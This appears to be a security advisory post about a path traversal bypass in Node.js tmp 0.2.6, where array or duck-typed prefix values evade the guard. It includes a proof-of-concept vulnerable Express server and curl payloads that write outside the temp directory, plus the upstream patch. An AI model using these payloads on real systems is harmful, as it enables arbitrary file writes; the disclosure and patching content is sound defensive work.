Listen to this Post
The `_assertPath` guard, introduced in [email protected] to block path traversal sequences, incorrectly assumes its input is always a string. It relies on `.includes(‘..’)` to detect and reject dangerous values. However, when a non‑string value—such as an Array, a Buffer, or any object with a falsy `includes` method—is supplied as the prefix, postfix, or `template` option, the guard fails. For an array, `[‘../escape’].includes(‘..’)` returns `false` because it compares elements, not the stringified representation. For a duck‑typed object, a custom `includes: () => false` trivially bypasses the check.
After the guard returns, the non‑string value flows into _generateTmpName, where it is stringified (e.g., via `Array.prototype.join` or implicit `String` coercion) and then passed to path.join(tmpDir, opts.dir, name). The resulting path still contains the `../` sequences, effectively escaping the intended temporary directory. An attacker can then create a file or directory at an arbitrary location with the privileges of the host process.
This vulnerability affects any application that forwards untrusted data from JSON request bodies ({"prefix":["../escape"]}) or bracket‑array query strings (?prefix[]=../escape) directly into tmp.file, tmp.fileSync, tmp.dir, tmp.dirSync, tmp.tmpName, or tmp.tmpNameSync, without explicit type coercion. Developers who trusted the 0.2.6 release notes (which claimed the guard prevented prefix/postfix traversal) are thus still exposed.
DailyCVE Form:
Platform: ……. Node.js tmp
Version: …….. 0.2.6
Vulnerability :…… Path traversal bypass
Severity: ……. High
date: ………. 11 Jun 2026
Prediction: …….. 27 May 2026
What Undercode Say:
Install vulnerable version npm install [email protected] express@5 victim-server.js (Express app forwarding JSON body) const express = require('express'); const tmp = require('tmp'); const fs = require('fs'); const path = require('path'); const app = express(); app.use(express.json()); const TENANT_BASE = fs.mkdtempSync('/tmp/tenant-base-'); app.post('/upload', (req, res) => { const userPrefix = req.body.prefix; tmp.file({ tmpdir: TENANT_BASE, prefix: userPrefix }, (err, filepath) => { if (err) return res.status(400).json({ error: err.message }); res.json({ filepath }); }); }); app.listen(3000); Attack 1: string prefix (blocked) curl -X POST -H 'Content-Type: application/json' \ -d '{"prefix":"../escape-string"}' http://127.0.0.1:3000/upload Attack 2: array prefix (bypass) curl -X POST -H 'Content-Type: application/json' \ -d '{"prefix":["../escape-array"]}' http://127.0.0.1:3000/upload Attack 3: multi‑level traversal curl -X POST -H 'Content-Type: application/json' \ -d '{"prefix":["../../../etc/poc-tmp-bypass"]}' http://127.0.0.1:3000/upload
Exploit:
Supply a non‑string value (Array, Buffer, or object with includes: () => false) as the prefix, postfix, or `template` option. The guard accepts it, but later stringification reintroduces ../, causing the final path to escape the temporary directory.
Protection:
Update to [email protected] or later. Alternatively, apply the upstream patch that enforces a strict type check before the path traversal test:
-function _assertPath(path) {
- if (path.includes("..")) {
+function _assertPath(option, value) {
+ if (typeof value !== 'string') {
+ throw new Error(<code>${option} option must be a string, got "${typeof value}".</code>);
+ }
+ if (value.includes("..")) {
throw new Error("Relative value not allowed");
}
- return path;
+ return value;
}
As defence in depth, validate the final resolved path against `tmpdir` after name generation.
Impact:
Arbitrary file/directory creation outside the intended temporary directory. The attacker can write controlled content to any location the process can access, enabling tenant boundary crossing in multi‑tenant services, source tree modification in CI/CD pipelines, and potential symlink‑swap attacks. CVSS 8.1 (High).
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
